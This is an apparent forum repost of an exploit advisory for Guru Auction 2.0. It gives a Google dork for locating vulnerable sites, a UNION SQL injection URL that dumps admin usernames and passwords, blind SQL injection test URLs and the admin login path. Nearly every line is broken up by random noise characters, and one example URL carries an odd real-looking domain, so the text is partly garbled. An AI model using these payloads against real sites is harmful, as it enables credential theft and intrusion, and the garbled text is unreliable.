Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
( x# M K% h& N* K5 Z: y; L. H# I9 Y
" Z5 w, V/ g% H# m- d4 K作者 : v3n0m
/ b2 z- ^7 ?7 ?# f1 \- C应用 : Guru Auction 2.0
, ~) ?: c! C/ B# b: `Price : $499 Z, s) ]& O3 ?* O5 L
Vendor : http://www.guruscript.com/
: K- S0 [5 ]) H1 G5 K, FGoogle Dork : inurl:subcat.php?cate_id=
& J4 R" p7 `, [! Q% Q7 D, m3 Q
# i; d1 ]; H3 A; T9 p+ S9 R W( ZSQLi p0c:
- F0 Q. z' f/ |$ p$ S" B7 ?0 m9 u! h~~~~~~~~~~ T9 j- u- A7 S% m1 X) v. U1 X- N/ T
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--" K* R) V9 c% ^6 i6 u
. J- y6 I! L4 v1 K# I& M/ Z
1 m* ~7 I& C, |9 C' L2 F W盲注 p0c:
: V+ t% F( r0 J2 [~~~~~~~~~~
1 _1 ], d* y/ R0 x2 Ohttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true. d4 N Y" L, u- t/ ~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false. X) K0 n0 k# z+ G( c" f
+ J+ F* \+ a- a. K& u+ w. N% M/ F管理登录入口:
& _7 u, F0 q6 E9 n~~~~~~~~~~
' j* O/ ^9 _" q* Xhttp://domain.tld/[path]/admin/
. \1 B% J5 u5 s; s: H |
发表于 2012-12-31 09:24:05
收藏
支持
反对